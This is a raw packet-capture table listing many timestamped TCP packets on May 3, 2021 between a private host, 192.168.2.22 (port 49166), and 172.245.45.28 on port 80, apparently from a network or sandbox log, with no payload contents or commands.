May 3, 2021 10:44:30.026784897 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026802063 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026808977 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026818991 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026820898 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026837111 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026840925 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026854992 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026858091 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026870966 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026875973 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026891947 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026899099 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026909113 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026913881 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026926994 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026930094 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026942968 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026945114 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026959896 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026962996 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026981115 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026983976 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.027000904 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.027000904 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.027013063 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.027021885 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.027033091 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.027039051 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.027056932 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.027062893 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.027074099 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.027076960 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.027095079 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.027106047 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.031968117 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.031996012 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032011986 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032028913 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032046080 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032053947 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032062054 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032078028 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032083988 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032104015 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032105923 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032111883 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032118082 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032123089 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032139063 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032143116 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032155991 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032155991 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032171011 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032172918 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032186985 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032191992 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032205105 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032211065 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032222986 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032233000 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032242060 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032252073 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032269001 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032274961 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032284021 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032286882 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032300949 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032305002 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032318115 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032321930 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032339096 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032341957 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032356024 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032365084 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032377958 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032382011 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032396078 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032398939 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032412052 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032413006 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032428980 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032430887 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032449007 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032449007 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032464981 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032469034 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032483101 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032483101 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032497883 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032500029 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032515049 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032520056 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032531977 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032538891 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032550097 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032557011 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032572031 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032578945 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032589912 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032591105 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032607079 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032609940 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032624960 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032625914 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.032641888 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.032659054 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.225785971 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.225821018 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.225841999 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.225860119 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.225861073 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.225878000 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.225888014 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.225893021 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.225895882 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.225898981 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.225913048 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.225918055 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.225934982 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.225935936 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.225950003 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.225954056 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.225967884 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.225971937 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.225991011 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.225996971 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.226006985 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.226016045 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.226027966 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.226032972 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.226047039 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.226051092 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.226066113 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.226083994 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.227179050 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.227209091 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.227273941 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.229032993 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253078938 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253109932 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253127098 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253144026 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253161907 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253174067 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253177881 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253196955 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253202915 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253207922 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253210068 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253215075 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253218889 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253233910 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253237963 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253256083 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253258944 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253277063 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253277063 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253294945 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253294945 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253310919 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253314972 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253325939 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253331900 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253340960 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253349066 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253365993 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253367901 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253381968 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253401041 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253405094 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253427029 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253441095 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253446102 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253457069 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253464937 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253473997 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253483057 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253500938 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253505945 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253515005 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253519058 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253531933 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253536940 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253547907 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253554106 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253566027 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253575087 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253583908 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253593922 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253608942 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253608942 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253627062 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253628969 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253643036 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253647089 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253659010 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253665924 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253678083 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253681898 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253695011 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253700018 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253712893 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253720999 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253731012 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253740072 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253757954 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253767967 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253782034 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253793955 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253807068 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253818989 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253832102 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253844976 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253856897 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253869057 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253881931 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253895044 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253900051 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253911018 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253921986 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253933907 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253942013 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253950119 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253962994 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253976107 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253979921 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.253992081 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.253998995 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254009962 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254015923 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254024982 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254034996 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254050970 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254054070 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254065990 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254071951 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254082918 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254091978 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254098892 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254110098 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254123926 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254127026 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254141092 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254144907 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254158974 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254163980 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254174948 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254182100 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254192114 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254199028 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254209042 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254221916 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254232883 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254241943 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254250050 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254261017 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254276991 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254280090 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254292011 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254295111 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254307985 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254312038 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254324913 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254329920 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254345894 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254354000 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254362106 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254368067 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254378080 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254391909 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254404068 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254410028 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254419088 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254429102 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254446030 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254446030 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254461050 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254462957 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254477024 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254479885 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254499912 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254503012 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254513025 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254520893 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254540920 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254544020 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254553080 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254559994 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254576921 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254579067 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254592896 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254595995 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254612923 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254630089 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254630089 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254648924 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254651070 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254666090 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254668951 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254679918 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254688025 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254695892 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254705906 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254723072 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254724979 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254740000 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254741907 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254759073 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254759073 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254772902 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254777908 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254795074 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254807949 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254812956 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254816055 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254829884 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254834890 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254848957 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254861116 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254873991 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254884958 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254897118 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254909039 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254925966 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254937887 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254954100 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254955053 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254966021 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254976988 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.254985094 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.254996061 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255012035 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255023956 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255027056 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255032063 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255043983 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255048037 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255059958 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255064011 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255078077 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255080938 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255095005 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255099058 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255115986 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255130053 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255134106 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255136967 CEST	49166	80	192.168.2.22	172.245.45.28
